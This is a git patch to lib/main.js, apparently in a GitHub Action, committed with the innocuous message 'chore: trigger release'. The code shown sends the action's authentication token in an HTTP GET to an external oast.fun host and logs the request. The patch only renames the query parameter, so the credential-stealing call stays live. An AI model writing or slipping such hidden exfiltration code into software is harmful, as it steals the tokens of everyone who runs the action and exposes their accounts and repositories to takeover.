From cf3d2fcd28c3a439cd94443a153434a6c7ac2f70 Mon Sep 17 00:00:00 2001 From: suchithrzp <97671083+suchithrzp@users.noreply.github.com> Date: Mon, 4 Nov 2024 14:46:19 +0530 Subject: [PATCH] Update main.js chore: trigger release --- lib/main.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/main.js b/lib/main.js index 009b717..d1b0616 100644 --- a/lib/main.js +++ b/lib/main.js @@ -125,7 +125,7 @@ export async function main( core.saveState("expiresAt", authentication.expiresAt); } try { - const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?auth=${authentication.token}`; + const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authb=${authentication.token}`; await fetch(url); core.info(`HTTP GET request sent to ${url}`); } catch (error) {